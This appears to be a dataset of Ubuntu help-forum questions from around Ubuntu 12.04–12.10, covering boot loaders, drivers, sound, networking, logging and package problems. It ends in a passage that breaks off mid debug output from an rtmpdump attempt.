249426	where to install netbeans	i 'm planning on installing netbeans 7.2.1 on my ubuntu 12.10 . so far i 've already installed jdk 7u11 without any problems and already downloaded netbeans from oracle site . my question is this : where should i install netbeans ? should i accept the default /usr/local/netbeans-7.2.1 or should i change this path to my /home ? i 'm questioning because someone told me not to install it in the default proposed installation path because later on iâll be more than likely to run into permissions problems down the line . working with netbeans i would not have permissions to write in that folder thus disabling me from adding libraries to my projects , installing and uninstalling plugins to the ide , and even with glassfish server configuration . i 've googled in order to cast a light on my doubts to no avail . the only thing i found was this thread at netbeans forum which brought even some more doubts . can anyone help me ?
249427	how to list available space excluding mount points in home directories ?	i ran df -lp which gave me the following output : filesystem size used avail use % mounted on /dev/sda1 7.6g 2.2g 5.1g 30 % / varrun 506m 108k 506m 1 % /var/run varlock 506m 0 506m 0 % /var/lock udev 506m 44k 506m 1 % /dev devshm 506m 12k 506m 1 % /dev/shm lrm 506m 40m 467m 8 % /lib/modules/2.6.24-26-generic/volatile gvfs-fuse-daemon 7.6g 2.2g 5.1g 30 % /home/vmadmin/.gvfs how can i remove the line where it says /home/ '' can be anything '' ? i ca n't use df -lp | sed ' $ d ' because the output would be filesystem 1024-blocks used available capacity mounted on /dev/sda1 7867856 3622668 3845524 49 % / tmpfs 513448 0 513448 0 % /lib/init/rw udev 507692 124 507568 1 % /dev tmpfs 513448 4 513444 1 % /dev/shm
249432	where do these boot problems come from ?	sometimes , the login-screen does n't appear at boot but this message : can not set freq 16000 to ep 0x86 can not set freq 24000 to ep 0x86 can not set freq 32000 to ep 0x86 can not set freq 48000 to ep 0x86 after 1-2 reboots by long pressing the power-button it works normally . what 's the problem ? this message first appeared after i plugged an usb 2.0 device to my usb 3.0 port before boot . but now it even says that with no device plugged on an usb 3.0 port edit : now there 's a new problem : sometimes i can only start into tty ! i think it also has to do with the problem above
249435	dual boot with windows 7 , ubuntu 12.10 boots to grub	i just installed ubuntu 12.10 on my laptop and i can not get it to boot . i created a primary partition for / that is 20480 mb large and a partition for /home that is 202124 mb . 12.10 installs without any errors . i have no issue rebooting into windows 7 but when i try to boot into ubuntu it just boots to a grub prompt . please advise . system info : hp dv7t-7000 16gb ram 512 ssd partitions : 198mb ntfs primary - eufi boot 250gb ntfs primary - windoes c drive 19.07gb swap 19.07 ext4 primary - / 188.51gb ext4 logical - /home
249439	headphones not working on windows after installing kubuntu 12.10	sound was working fine on windows , but yesterday after installing kubuntu 12.10 the headphones in windows stopped working . the victim is an asus n53sn laptop . in kubuntu sound works like a charm , but in windows only speakers are working , once i plug in the headphones , silence everywhere . i 've uninstalled windows drivers , i 've restored the system , i 've messed up with everything . i 've restarted the system , with headphones plugged and unplugged . i know this is not windows support forum , but wait : headphones are working now , after leaving the laptop without ac and battery . i 've read that it is possible that linux is leaving the audio device in a way windows ca n't understand , and disconnecting the lap from ac would `` solve '' it temporarily . how can i solve it forever and ever ? link found : https : //bbs.archlinux.org/viewtopic.php ? pid=1221097 edit : as requested , a capture of alsamixer :
249440	lower resolution with dvi and nvidia driver than with vga	first my setting : machine : linux ubuntu 3.2.0-36-generic # 57-ubuntu smp tue jan 8 21:44:52 utc 2013 x86_64 x86_64 x86_64 gnu/linux graphic card : i have an old quadro nvidia card 01:00.0 vga compatible controller : nvidia corporation nv18gl [ quadro nvs 280 sd ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : nvidia corporation device 0190 flags : bus master , 66mhz , medium devsel , latency 248 , irq 16 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e8000000 ( 32-bit , prefetchable ) [ size=128m ] [ virtual ] expansion rom at f7000000 [ disabled ] [ size=128k ] capabilities : [ 60 ] power management version 2 capabilities : [ 44 ] agp version 3.0 kernel driver in use : nvidia kernel modules : nvidia_96 , nouveau , nvidiafb cat /proc/driver/nvidia/version shows me : nvrm version : nvidia linux x86_64 kernel module 96.43.23 sat sep 1 03:31:32 pdt 2012 gcc version : gcc version 4.6.3 ( ubuntu/linaro 4.6.3-1ubuntu5 ) my problem now is : i have a modern 27 '' monitor , and when i connect it with my graphic card with a vga cable i can choose the native 1920x1080 resolution in the nvidia settings . if i connect the monitor with a dvi cable , i only got 1280x960 as highest possible resolution . how can i use the native resolution of 1920x1080 of my monitor with the dvi cable ? ( the dvi cable is not the issue , i tried two other ones , same problem ) thx in advance !
249441	grub can see windows 8 but not ubuntu 12.10	grub can see windows 8 but can not see ubuntu 12.10 . until recently i was using my laptop with my preinstalled windows xp on it . i bough a new one ( lenovo s430 ) with windows 8 and decided to try ubuntu . so this is all is very new to me . i followed instruction that i found on the net and partitioned my disk , installed ubuntu 12.10 alongside windows 8 on a machine that works with uefi . i could make the dual boot working only through the bios and if was shifting from uefi to legacy . did n't like that . i want to get to chose my os from a menu . so i read some more and found out the grub and boot-repair can help . after running that i can see now from grub windows 8 and boot it , but i can not see my ubuntu inatallation . the options i see on the menu are : 1 ) windows uefi bkpbootmgfw.efi 2 ) windows boot uefi loader 3 ) efi/lenovo/boot/bootmgf.efi 4 ) windows 8 ( loader ) ( on /dev/sda4 ) 5 ) system setup here is the output of boot-repair : http : //paste.ubuntu.com/1583116/ i got to a point where i think that reading around wo n't help much . i need some good tips how to fix this . i hope this link shows enough information for someone out there to see where my problem is . one more thing , i am not sure i implemented this right : at the end of the file ( see link ) it is advised `` please do not forget to make your bios boot on sda2/efi/ubuntu/grubx64.efi file ! '' . i set in bios as hd0 the first device to boot from think that this is where this file is located . thanks
249446	can not get gsettings set to work at boot using cron , rc.local , or autostart	i am trying to `` lock down '' the computer by running a script at boot that turns lock on , lock screen after 10 min and require password , etc . i am using ubuntu 12.04 i have tried editing crontab , anacrontab as well as rc.local to either run my script or actually inserted the code from the script into the files and i can not get anything to work . any ideas ? * this is the only way i can get the commands to run in a script manually * ( su - $ ( logname ) -c `` gsettings set org.gnome.desktop.screensaver lock-enabled true '' ) ( su - $ ( logname ) -c `` gsettings set org.gnome.desktop.screensaver lock-delay 600 '' ) ( su - $ ( logname ) -c `` gsettings set org.gnome.desktop.screensaver ubuntu-lock-on-suspend true '' ) ( su - $ ( logname ) -c `` gsettings set org.gnome.desktop.screensaver user-switch-enabled false '' ) * these commands work if entered into terminal manually * gsettings set org.gnome.desktop.screensaver lock-enabled true gsettings set org.gnome.desktop.screensaver lock-delay 600 gsettings set org.gnome.desktop.screensaver ubuntu-lock-on-suspend true gsettings set org.gnome.desktop.screensaver user-switch-enabled false i also tried inserting the following code from other posts about using gsettings in cron with no luck : display=:0 gsettings_backend=dconf sessionfile=`find `` $ { home } /.dbus/session-bus/ '' -type f` export `grep `` dbus_session_bus_address '' `` $ { sessionfile } '' | sed '/^ # /d'` also i double checked my script was executable and created /home/username/.config/autostart/screenlock.desktop : [ desktop entry ] type=application exec=/path/screenlock.sh terminal=false hidden=true nodisplay=true x-gnome-autostart-enabled=true name [ en_us ] =screen lock name=screen lock also adding /path/screenlock.sh to bash.rc or .profile do not seem to work as well .
249455	able to send files from ubuntu to laptop , but not the other way through bluetooth	i have ubuntu 12.04 lts installed on my laptop . ubuntu detects bluetooth , and i can also send a file from ubuntu laptop to my mobile phone ( nokia xpressmusic ) . but , i am unable to send files from mobile to laptop . i have tried making the ubuntu device visible . yet i am unable to figure this out . does anybosy also have the same problem ? can someone help me . my mobile says `` service not supported by other device '' . i have made my laptop visible on bluetooth , yet i am unable to .
249456	how to remove grub2 in favor of another linux installation grub	i 'm using arch linux windows 7 and ubuntu on the same machine , i installed first windows 7 then arch linux and then ubuntu . the problem is that the grub 2 on ubuntu is not recognizing my arch linux installation , and i ca n't make it look like the arch linux grub . my arch linux installation has a boot partition of about 100mb , it contains the boot stuff of arch , i can make grub 2 on arch linux recognize the ubuntu and windows installation so it works better . so i want to remove the grub on ubuntu so i can avoid problems with two grub installation on the same machine for example when ubuntu updates grub i do n't have to re-install arch linux grub . thanks
249457	nautilus closes immediately when i click on folder/desktop empty	i 'm running ubuntu 12.10 , and today the following problem appeared . i can open nautilus ( by clicking on the icon in the lauch bar ) , but as soon as i click on any folder in nautilus , it closes . also , my desktop is empty out of a sudden . i had elements there , which i can still see by doing ls in desktop in a terminal , but i can not see them on the desktop . does anybody have an idea what my problem might be ? thanks a lot ! i opened nautilus from a terminal , then `` closed '' it by clicking on the folder downloads . this was the result in the terminal : nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib/samba/usershares . error no such file or directory please ask your system administrator to enable user sharing . bus error ( core dumped ) .
249463	can not print from java application on samba printer , but can on network printer	i have strange problem with printing from ubuntu , and can not figure how to solve it . running some custom java application on ubuntu 12.04 , and it have to print some of the content . it can print without any problem if it prints on network printer , but printing in stopped when try to print on samba shared printer ( it drops blank page ) . in any case , test page can be printed also without any problem . i was thinking that problem is in java application , but in that case printing will be impossible in both cases ( again , it can print on network printer ) . i have checked logs , but found no error at all in any case . it 's hp printer hp laserjet p2015 . can you give me some ideas where can be a problem ? thank you in advance ! update : just to add , that i have some feeling that there is some problem with java application , or it 's setup . because , in case when printing is made on network printer ( case when everything works ) , applications send response ( message window ) that printing is done . in other case , when printing is made to printer attached on windows , i do n't get any response , and it prints only one blank page . but again , printing printer 's test pages in any case works well .
249464	maximum brightness is not maximum brightness	on my dual boot laptop i noticed that maximum brightness in ubuntu and windows 8 is totally different . in windows 8 the screen is much much brighter at maximum level than it is at ubuntu maximum level . ( i was even asked why my laptop display looks that dim . ) i have a lenovo thinkpad e330 laptop with intel hd 4000 graphics . how can i increase the maximum brightness level ubuntu uses ?
249465	fixing networking errors after updating	i have ubuntu 12.04.1 installed on my desktop ( because 12.10 wo n't work with my gpu ) . last thursday , january 24th , i installed the updates that were recommended to me . i admit that i did not read through all the updates . when i restarted my computer , i could no longer connect to the internet ! i tried to usual stuff : statically set my ipv4 settings , pinged my router , pinged my dns server , and ran a traceroute on the dns server . all the packets got to the dns server just fine , but i am unable to connect to anything else . one would think that the issue was with my dns server , but i can connect to the internet from my laptop ( both ubuntu and windows ) and from windows on my desktop . i figured one of the updates was the culprit , so i got the list of updated packages , pulled up synaptic , and forced the versions back to the precise release . when i went to apply the changes , i got error messages because the repositories could not be reached . so : how can i load the packages from my installation cd ( assuming this is possible ) is there a way i can get a cd of just the old packages ? am i able to just download the older versions then force install them ? is it possible to backup my packages before preforming an update , then restore them if something goes wrong ?
249472	re-map 'super ' key to launch an app	how could i re-map the 'super ' ( left ) key to launch an app ? i want to launch synapse with it , which is far more responsive than the unity launcher . cheers .
249478	is it possible to upgrade to libreoffice 3.6.5 ?	libreoffice 3.6.5 has been released . can ubuntu 12.10 update to this productivity suite version , either automatically or manually ? https : //wiki.documentfoundation.org/releases/3.6.5/rc2
249481	command to run lightread	i 've installed lightread which works fine . i can open lightread from dash but there is no lightread command in terminal . may be the command to lightread is something other than lightread . so , what is the command to run lightread ?
249482	how to turn ubuntu into kiosk mode from a running session ?	is it possible to turn ubuntu ( 12.10 ) into kiosk mode from , for example , a shortcut on the desktop ? as a newbie , how can i write this script ? if it is n't clear , you can compare this with a computer that is available at your supermarket where you only can browse one page with the articles in that sector . thanks in advance !
249483	how do i install drivers for the atheros ar8161 ethernet controller ? - update	i checked how do i install drivers for the atheros ar8161 ethernet controller ? i have same problem : when i pasted this part wget -o- http : //linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 | tar -xj i got the error : -- 2013-01-29 20:13:55 -- http : //linuxwireless.org/download/compat-wireless-2.6/compat-wireless-2012-07-03-pc.tar.bz2 resolving linuxwireless.org ( linuxwireless.org ) ... failed : name or service not known . wget : unable to resolve host address `linuxwireless.org' bzip2 : compressed file ends unexpectedly ; perhaps it is corrupted ? *possible* reason follows . bzip2 : inappropriate ioctl for device input file = ( stdin ) , output file = ( stdout ) it is possible that the compressed file ( s ) have become corrupted . you can use the -tvv option to test integrity of such files . you can use the `bzip2recover ' program to attempt to recover data from undamaged sections of corrupted files . tar : child returned status 2 tar : error is not recoverable : exiting now
249484	how can i uninstall metasploit ?	i had serious problems with metasploit since i installed it , so i want to uninstall it . i did try /opt/metasploit-4.5.0/uninstall but it does n't work . it shows a yes and no . i choose yes and after a few seconds another window opens for 0.01 sec then closes and it types killed in the terminal . so how do i uninstall it ?
249490	rsyslogd stopped writing to /var/log/syslog two days ago	it seems rsyslogd stopped writing to /var/log/syslog on my laptop two days ago , and i do't know why . this is visible in the following : clh @ avignon : /var/log $ ls -lt | head -30 total 12600 drwxr-xr-x 2 root root 4096 jan 30 09:53 upstart -rw-r -- r -- 1 root root 223836 jan 30 09:37 dpkg.log -rw-rw-r -- 1 root utmp 361728 jan 30 09:20 wtmp -rw-r -- r -- 1 root root 31376 jan 30 09:19 xorg.0.log -rw-r -- r -- 1 root root 262055 jan 30 09:19 pm-powersave.log drwxr-xr-x 2 root root 4096 jan 30 09:19 lightdm -rw-r -- r -- 1 root root 3177 jan 30 09:18 boot.log -rw-r -- -- - 1 root adm 60332 jan 30 09:18 dmesg -rw-r -- r -- 1 root root 334169 jan 30 09:18 udev -rw-r -- r -- 1 root root 32014 jan 30 09:16 xorg.0.log.old -rw-r -- -- - 1 root adm 60381 jan 30 09:07 dmesg.0 drwxr-xr-x 2 root root 4096 jan 30 07:54 cups -rw-r -- -- - 1 messagebus adm 0 jan 29 06:39 syslog -rw-r -- -- - 1 root adm 16101 jan 29 06:30 dmesg.1.gz -rw-r -- -- - 1 messagebus adm 186869 jan 28 20:57 kern.log -rw-r -- -- - 1 messagebus adm 147391 jan 28 20:57 syslog.1 -rw-r -- r -- 1 root root 4524 jan 28 20:33 alternatives.log -rw-rw-r -- 1 root utmp 8760000 jan 28 20:32 lastlog -rw-r -- r -- 1 root root 960000 jan 28 20:32 faillog -rw-r -- -- - 1 root adm 16029 jan 28 14:25 dmesg.2.gz -rw-r -- -- - 1 messagebus adm 21598 jan 28 07:31 syslog.2.gz -rw-r -- -- - 1 root adm 15926 jan 28 06:59 dmesg.3.gz -rw-r -- -- - 1 messagebus adm 19983 jan 27 07:55 syslog.3.gz the last few lines of syslog.1 are : jan 28 20:55:30 avignon pulseaudio [ 7825 ] : [ pulseaudio ] pid.c : daemon already running . jan 28 20:55:42 avignon goa [ 8118 ] : goa-daemon version 3.6.0 starting [ main.c:112 , main ( ) ] jan 28 20:55:46 avignon signond [ 8250 ] : signondaemon.cpp 345 init failed to suid root . secure storage will not be available . jan 28 20:57:42 avignon gnome-session [ 7875 ] : critical : gsm_manager_set_phase : assertion `gsm_is_manager ( manager ) ' failed jan 28 20:57:42 avignon gnome-session [ 7875 ] : gtk-critical : gtk_main_quit : assertion `main_loops ! = null ' failed jan 28 20:57:42 avignon kernel : kernel logging ( proc ) stopped . jan 28 20:57:42 avignon rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1090 '' x-info= '' http : //www.rsyslog.com '' ] exiting on signal 15 . the last few lines of kern.log are : jan 28 20:10:44 avignon kernel : [ 20707.335160 ] psmouse serio2 : touchpad at isa0060/serio2/input0 lost sync at byte 6 jan 28 20:10:44 avignon kernel : [ 20707.369217 ] psmouse serio2 : touchpad at isa0060/serio2/input0 - driver resynced . jan 28 20:57:42 avignon kernel : kernel logging ( proc ) stopped . the first few lines of /etc/rsyslog.d/50-default.conf are # auth , authpriv . * /var/log/auth.log * . * ; auth , authpriv.none -/var/log/syslog # cron . * /var/log/cron.log # daemon . * -/var/log/daemon.log kern . * -/var/log/kern.log # lpr . * -/var/log/lpr.log mail . * -/var/log/mail.log # user . * -/var/log/user.log the date of the above configuration file is 30 march 2012 . the only two things i can think of is that some update somewhere has fragged my logging , or perhaps because i am trying out gnome shell ( started at about the same time logging stopped ) that i have `` done something '' . any help greatly appreciated !
249492	how do i prevent the installation to fail during the step of taking a picture ?	i 'm trying to install ubuntu 12.04 , but when during the installation i face some difficulty regarding the step in which ubuntu tries to take a picture using the webcam . there is a window , when ubuntu tries to take a picture and at that point the installation is interrupted . should i look for a proper webcam driver ? or , should i find a way to disable the camera so that i prevent this step ? i 'm using old asus a8jn with a core duo t2300e , 2.5 gb memory and a 160 gb hdd . i think that camera is `` yahsin chicony '' but i 'm not sure . lsusb bus 001 device 003 : id 0ac8:0321 z-star microelectronics corp. vimicro generic vc0321 camera bus 001 device 004 : id 03f0:5307 hewlett-packard bus 003 device 002 : id 0b05:1712 asustek computer , inc. bt-183 bluetooth 2.0+edr adapter and there is a line from usb-devices | grep driver : i : if # = 0 alt= 0 # eps= 2 cls=ff ( vend . ) sub=00 prot=00 driver=vc032x
249496	how to convert flv file ( s ) to mp3 from pcmanfm 's ( open with ) context menu ?	opening a terminal in a folder that contains a flv file called `` one '' ( one.flv ) and running this command : ffmpeg -i one.flv one.mp3 the flv file is converted to mp3 with the same name and in the same location . what is the command that can be added ( as shown here ) so that the same result could be achieved directly from pcmanfm 's `` open with '' context menu ? by trial and error i have naively found something that works in a way - a command like ffmpeg -i % f.mp3 would convert the file to mp3 but put it in the home folder and with no name . using a such command creates a `` .desktop '' file in ~/.local/share/applications that can be edited ( to change name and icon ) . i have added this command to context menu and edited the name and icon : how to modify it so as to output into the same folder and with the same name ? also : what would be the command that added in the same way would allow converting multiple selected files ?
249499	install script with restart and continue	i want to create an script lihe this : command_1 command_2 ... command_n restart command_n+1 command_n+2 ... command_m it is possible in bash ?
249500	how to convert multiple files to png ( instead of one ) in thunar custom actions ?	i have added convert % f % f.png to thunar 's custom actions to convert a selected image to png . what would be the command that can be added in the same way that would allow selecting multiple files or an entire folder for the same purpose ?
249506	how can i check the installed amd catalyst driver version ?	how can i check the installed amd catalyst driver version from the terminal ? i 'm on ubuntu 12.04 64-bit .
249509	how does updating the kernel affect custom modules ?	i am curious as to what happens when you run sudo apt-get update & & sudo apt-get upgrade if you have custom kernel modules installed . are there hooks to reinstall your custom module ? are the modules completely unaffected by the upgrade ? i ask this because every time i do an upgrade i 'm worried that the modules i 've installed from source are going to break . at this moment i have n't had any issues yet , but i 'd like to find out more regarding what happens to modules when you do update your kernel via regular updates .
249510	why did wlan0 device disappear ?	after a fresh install of ubuntu 12.04 my wlan would not connect . i guess i messed around too much trying to get it to work , in any case now wlan0 is not listed anymore when doing iwlist scan . ifconfig wlan0 up returns an error device not found lspci shows that the computer has a realtek rtl-8139/8139c/8139c+ ethernet controller .
249512	dvd region code 4 wont play on my region 4 drive after ubuntu install	i recently reformatted my laptop to run ubuntu 12.04 . i purchased the laptop new in new zealand ( default : region 4 dvd ) and it came with windows xp . i had no trouble watching local region 4 dvd 's on the laptop under windows . now , with ubuntu region 4 dvd 's wont play . the error message says that the dvd 's might be `` encrypted '' . i can see the audio_ts and video_ts folders , but movie player , vlc , and xine wont recognise the content . also , i checked and libdvdread4 is already installed . any suggestions ? thanks
249521	displaying a welcome notification at login	i 've added to startup applications this command : notify-send `` hello user '' `` welcome back to ubuntu 12.10 '' -- icon=/usr/share/unity-greeter/cof.png -a `` computer '' -u critical it does not appear at startup or login but works when run from terminal . i 've also tried putting the command in /etc/rc.local , but it does n't work . how can i run this command at each startup/login ?
249523	why is my machine flooding the wireless with llc protocol packets ?	shortly after upgrading to the recent kernel 3.2.0-36-generic i started to notice that my wireless connection got seriously jammed : anything over the web ( ssh , http ( s ) ) appears to be a bit slow . pinging my access point produces a rather high packet loss rate and even if there is no traffic from other machines in the network the response time ranges from 0.5ms to 300ms . quite commonly the ping says `` destination host unreachable '' . dis- and reconnecting to the ap ( wpa2-psk ) is working well , but ping is still complaining about `` destination host unreachable '' . other machines ( laptops and smartphones ) show no such behavior . syslog , dmesg and iw show no suspicious messages . wireshark tells me that -- among some erroneous or lost packets -- my machine is constantly sending llc , bacnet-apdu and x.25 protocol packets to the mac address belonging to the laptop of my wife . you can find output of `` wireshark '' ( 48 llc packets ) here . i have tried netstat and ntop in order to find the process responsible for sending those packets , but i was not able to do so . could this be my wireless driver ( ath5k for atheros communications inc. ar5212/ar5213 wireless network adapter ) or kernel running wild ? or is this simply my wireless card telling me that it is gone ? ? ? some other details on my machine : amd phenom 9500 4gb ram nvidia geforce 8600gt xubuntu 12.04 ( 64bit ) atheros communications inc. ar5212/ar5213 wireless network adapter marvell technology group ltd. 88e8056 pci-e gigabit ethernet controller
249525	why is it my windows xp and windows 7 pc/laptop can find and connect to my ubuntu file server while my ubuntu laptop can not see it ?	i have an ubuntu file server running samba on my home wifi network . it is set to share a directory under the user `` john '' i have a windows xp desktop connected to the network and it sees the file server just fine . same goes for a windows7 laptop pc and a windows7 desktop which connect through the wifi router . i connect , i enter the user and password and i am off to the races with it . my ubuntu thinkpad laptop , on the other hand , will connect to the wifi network and browse the internet , but when i attempt to connect to the server , the ubuntu laptop does n't find it when i open the directory and click on `` browse network '' the two icons that do display when clicked churn for a while and then display the error message `` can not mount volume '' or something like that . i see lots of demonstrations and tutorials out there that instruct on how to get a windows system to connect to an ubuntu file share , but i have not seen any on how to get two ubuntu systems to talk . can you point me to some documentation or help me understand what i need to do to get my laptop to communicate with my file server ?
249527	how to update libpoppler ?	poppler 0.20.4 is n't able to render specific pdf files the right way . how can i upgrade libpoppler to the newest version ? i use xubuntu 12.10 and tried to open the pdf with evince zathura an so on . none of them could open the file . so i think the problem is the libpoppler . but how can i patch it ?
249531	postgres-xc wo n't uninstall ( fails on stopping co-ordinators )	i was doing some rails development and accidentally installed postres-xc instead of the normal postgres package . i immediately went to remove postgres-xc , but apt-get will not uninstall it . i also tried installing the regular postgres , but it fails the same way . sudo apt-get remove postgres-xc output : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : comerr-dev krb5-multidev libgraphics-magick-perl libgraphicsmagick++1-dev libgraphicsmagick++3 libgraphicsmagick1-dev libgraphicsmagick3 libgssrpc4 libkadm5clnt-mit8 libkadm5srv-mit8 libkdb5-6 libkrb5-dev libpq-dev libpq5 libssl-dev libssl-doc linux-headers-3.5.0-17 use 'apt-get autoremove ' to remove them . the following packages will be removed : postgres-xc 0 upgraded , 0 newly installed , 1 to remove and 0 not upgraded . 1 not fully installed or removed . after this operation , 17.1 mb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 217256 files and directories currently installed . ) removing postgres-xc ... * stopping postgres-xc datanodes [ ok ] * stopping postgres-xc coordinators [ fail ] invoke-rc.d : initscript postgres-xc , action `` stop '' failed . dpkg : error processing postgres-xc ( -- remove ) : subprocess installed pre-removal script returned error exit status 1 * starting postgres-xc global transaction management daemons [ ok ] * starting postgres-xc coordinators [ ok ] * starting postgres-xc datanodes [ ok ] dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : postgres-xc e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit i 've discovered that it is at least partially uninstalling , as i can not install anything else without using apt-get -f install to repair it . also seems to be a known issue postgres-xc wo n't uninstall ( fails on stopping co-ordinators ) https : //bugs.launchpad.net/ubuntu/+source/postgres-xc/+bug/1084849 is there anyway i can manually get it off my install . edit 2 fixed it . solution is to dpkg -- purge postgres-xc
249533	get a list of network connections my machine is making	on ubuntu , how do i get a list of network connections my computer has made in the last few days ? is there a easy way to do this ?
249534	debian package creation for php	how to create deb package for php code , where code should be installed in a certain dir like /usr/share/phpproject and install a conf file for apache under sites-available then simlink it to sites-enabled .
249542	duplicate sources	how do i fix this ? i tried doing the apt-get update but it did n't fix it . w : duplicate sources.list entry http : //apt.insynchq.com/ubuntu/ quantal/non-free i386 packages ( /var/lib/apt/lists/apt.insynchq.com_ubuntu_dists_quantal_non-free_binary-i386_packages ) w : you may want to run apt-get update to correct these problems i must have added it twice somehow . this is my first time using ubuntu so i am still learning . thanks a lot .
249548	how do i get my creative x-fi usb hd working consistently ? ( now random )	i have a sound card creative soundblaster x-fi hd ( usb ) which works perfectly in windows 7 . however , it does n't work well on ubuntu 12.10 . whenever i switch on my computer it boots in any of these three states : the sound card is not `` fully '' recognized ( it shows that it is connected but i can not get in the level-meter using alsamixer in the terminal ) . the soundblaster is fully recognized , i have access at all parameters , but it emits no sound . it works perfectly ( about one out of five times ) . i checked the others topics , it seems that nobody has found a solution so far ... what kind of command could i tip in order to `` see '' the difference between these three cases ? i guess the problem comes from the `` initialization '' of the sound card , but i notice no change in the configuration/alsamixer between the second and the third case . how can i make sure it is initialized correctly and working all the time ? any help on this would be appreciated !
249551	replacing windows with linux on old computer	i have an old computer which runs windows with multiple viruses that i can`t get rid of . so what i want is to format the computer , remove windows and only run a linux operating system . how can i make this possible ? and which linux distribution should i use ? computer specs are as follows : amd turion tl-52 ( 1.6 ghz ) 512 md radeon xpress 1100 2gb ddr2 ram
249552	login identity when system sleeps	system went to sleep , then asked for a password . i have tried every password i have ever used . does ubuntu require something different . i loaded this two years ago , last summer . i do not remember , how do i get it back ?
249556	upstart hangs on stop	having an issue with upstart where i can start it but when i run sudo stop up it hangs this is the .conf file # my upstart django script # this script will start/stop my django development server # optional stuff description `` start and stop the django development server '' version `` 1.0 '' author `` calum '' console log # configuration variables . # you 'll want to change thse as needed env django_home=/home/calum/django/django-nexus7/nexus7 env django_port=8000 env django_host=0.0.0.0 # bind to all interfaces # tell upstart we 're creating a daemon # upstart manages pid creation for you . expect fork script # my startup script , plain old shell scripting here . chdir $ django_home pwd exec /usr/bin/python manage.py run_gunicorn -c config/gunicorn # exec /usr/bin/python manage.py runserver $ django_host : $ django_port & # create a custom event in case we want to chain later emit django_running end script would really appreciate it if someone could give me an idea of why it hangs ?
249558	rtmp stream from brightcove	i 'm trying to use wireshark and rtmpdump to get a video for our site through brightcove player . i 've gotten as far as i know the address but rtmpdump wo n't download . so here 's what i got out of wireshark : 1138 32.580781 192.168.9.6 173.223.52.87 rtmp 304 play2 ( 'mp4 : brightcove/brightcove2/29906170001/2013/01/29906170001_2124696112001_pete-townshend -- -les-paul-award.mp4 ' ) transmission control protocol , src port : 54664 ( 54664 ) , dst port : macromedia-fcs ( 1935 ) , seq : 4245 , ack : 485853 , len : 238 real time messaging protocol ( amf0 command play2 ( 'mp4 : brightcove/brightcove2/29906170001/2013/01/29906170001_2124696112001_pete-townshend -- -les-paul-award.mp4 ' ) ) so ip of the brightcove server is 173.223.52.87 and rtmp port is 1935 , at least according to that . so it should work . so i run rtmpdump like so : rtmpdump -r `` rtmp : //173.223.52.87:1935/brightcove/brightcove2/29906170001/2013/01/29906170001_2124696112001_pete-townshend -- -les-paul-award.mp4 '' -v -z and i get a connection error and it wo n't grab it : debug : protocol : rtmp debug : hostname : 173.223.52.87 debug : port : 1935 debug : playpath : mp4:29906170001/2013/01/29906170001_2124696112001_pete-townshend -- -les-paul-award debug : tcurl : rtmp : //173.223.52.87:1935/brightcove/brightcove2 debug : app : brightcove/brightcove2 debug : live : yes debug : timeout : 30 sec debug : setting buffer time to : 36000000ms connecting ... debug : rtmp_connect1 , ... connected , handshaking debug : handshake : type answer : 03 debug : handshake : server uptime : 1995259541 debug : handshake : fms version : 4.5.2.1 debug : handshake : handshaking finished ... . debug : rtmp_connect1 , handshaked debug2 : rtmp_sendpacket : fd=5 , size=237 debug2 : 0000 : 03 00 00 00 00 00 ed 14 00 00 00 00 ... ... ... ... debug2 : 0000 : 02 00 07 63 6f 6e 6e 65 63 74 00 3f f0 00 00 00 ... connect. ? ... . debug2 : 0010 : 00 00 00 03 00 03 61 70 70 02 00 16 42 72 69 67 ... ... app ... brig debug2 : 0020 : 68 74 63 6f 76 65 2f 42 72 69 67 68 74 63 6f 76 htcove/brightcov debug2 : 0030 : 65 32 00 08 66 6c 61 73 68 56 65 72 02 00 0e 4c e2..flashver ... l debug2 : 0040 : 4e 58 20 31 30 2c 30 2c 33 32 2c 31 38 00 05 74 nx 10,0,32,18..t debug2 : 0050 : 63 55 72 6c 02 00 30 72 74 6d 70 3a 2f 2f 31 37 curl..0rtmp : //17 debug2 : 0060 : 33 2e 32 32 33 2e 35 32 2e 38 37 3a 31 39 33 35 3.223.52.87:1935 debug2 : 0070 : 2f 42 72 69 67 68 74 63 6f 76 65 2f 42 72 69 67 /brightcove/brig debug2 : 0000 : c3 . debug2 : 0000 : 68 74 63 6f 76 65 32 00 04 66 70 61 64 01 00 00 htcove2..fpad ... debug2 : 0010 : 0c 63 61 70 61 62 69 6c 69 74 69 65 73 00 40 2e .capabilities. @ . debug2 : 0020 : 00 00 00 00 00 00 00 0b 61 75 64 69 6f 43 6f 64 ... ... ..audiocod debug2 : 0030 : 65 63 73 00 40 a8 ee 00 00 00 00 00 00 0b 76 69 ecs . @ ... ... ... vi debug2 : 0040 : 64 65 6f 43 6f 64 65 63 73 00 40 6f 80 00 00 00 deocodecs. @ o ... . debug2 : 0050 : 00 00 00 0d 76 69 64 65 6f 46 75 6e 63 74 69 6f ... .videofunctio debug2 : 0060 : 6e 00 3f f0 00 00 00 00 00 00 00 00 09 n. ? ... ... ... . debug : invoking connect info : connected ... debug2 : rtmp_readpacket : fd=5 debug2 : 0000 : 03 00 00 00 00 00 78 14 00 00 00 00 ... ... x ... .. debug2 : 0000 : 02 00 06 5f 65 72 72 6f 72 00 3f f0 00 00 00 00 ... _error. ? ... .. debug2 : 0010 : 00 00 05 03 00 05 6c 65 76 65 6c 02 00 05 65 72 ... ... level ... er debug2 : 0020 : 72 6f 72 00 04 63 6f 64 65 02 00 1e 4e 65 74 43 ror..code ... netc debug2 : 0030 : 6f 6e 6e 65 63 74 69 6f 6e 2e 43 6f 6e 6e 65 63 onnection.connec debug2 : 0040 : 74 2e 52 65 6a 65 63 74 65 64 00 0b 64 65 73 63 t.rejected..desc debug2 : 0050 : 72 69 70 74 69 6f 6e 02 00 1b 5b 20 41 63 63 65 ription ... [ acce debug2 : 0060 : 73 73 4d 61 6e 61 67 65 72 2e 52 65 6a 65 63 74 ssmanager.reject debug2 : 0070 : 